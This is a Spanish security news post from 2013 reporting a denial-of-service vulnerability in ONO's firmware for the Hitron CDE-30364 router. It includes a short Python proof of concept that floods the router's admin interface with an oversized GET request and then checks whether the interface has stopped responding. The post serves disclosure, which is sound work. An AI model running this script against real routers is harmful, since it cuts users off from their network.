jueves, 17 de octubre de 2013

Nueva vulnerabilidad en firmware de ONO para el router Hitron CDE-30364

Matías Mingorance Svensson ha descubierto un nuevo problema de seguridad en el firmware proporcionado por ONO para el router Hitron CDE-30364. En esta ocasión un atacante podría provocar una denegación de servicio y causar que el dispositivo dejase de responder.

Router Hitron CDE-30364 proporcionado por ONO
Tan sólo unas semanas después de descubrir múltiples vulnerabilidades Cross-Site Request Forgery (CSRF) en el firmware de ONO para el router Hitron CDE-30364, Matías Mingorance Svensson ha publicado un nuevo fallo de seguridad en el dispositivo que esta empresa de telecomunicaciones proporciona a sus clientes con conexiones de 30, 50 y 100 megas.

Se trata de un error de falta de comprobación de límites de los datos proporcionados en las peticiones HTTP realizadas mediante el método 'GET'. Aprovechar este fallo podría conducir a una denegación de servicio (DoS) ya que el dispositivo deje de responder.

Para ilustrar la vulnerabilidad Matías propone la siguiente prueba de concepto escrita en python. En ella se realiza una petición que contiene 100.010 caracteres 'A' a la interfaz de administración del dispositivo en el puerto 80 (la dirección IP del dispositivo se pasa como argumento al lanzar el script), tras la cual se intenta realizar una conexión a la interfaz web del router para comprobar si el ataque ha tenido éxito.

import httplib
import socket
import time
import sys

#Envío de la petición GET
print "Enviando la petición al router ONO Hitron CDE-30364...\n"
connct = httplib.HTTPConnection(sys.argv[1],80)
connct.request("GET", "AAAAAAAAAA"*10001)
connct.close()

#Comprobación
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(5)
try:
  s.connect((sys.argv[1], 80))
  s.shutdown(2)
  print "Ataque fallido!\n"
except:
  print "Ataque con éxito! La interfaz de administración del router es inaccesible!\n"



Esta vulnerabilidad se ha comprobado en dispositivos con firmware 3.1.0.8-ONO, aunque otras versiones también podrían verse comprometidas.

Más información:

ONO Hitron CDE-30364 Router Denial Of Service

Múltiples CSRF en firmware de ONO para el router Hitron CDE-30364

ONO > Hitron CDE-30364



Juan José Ruiz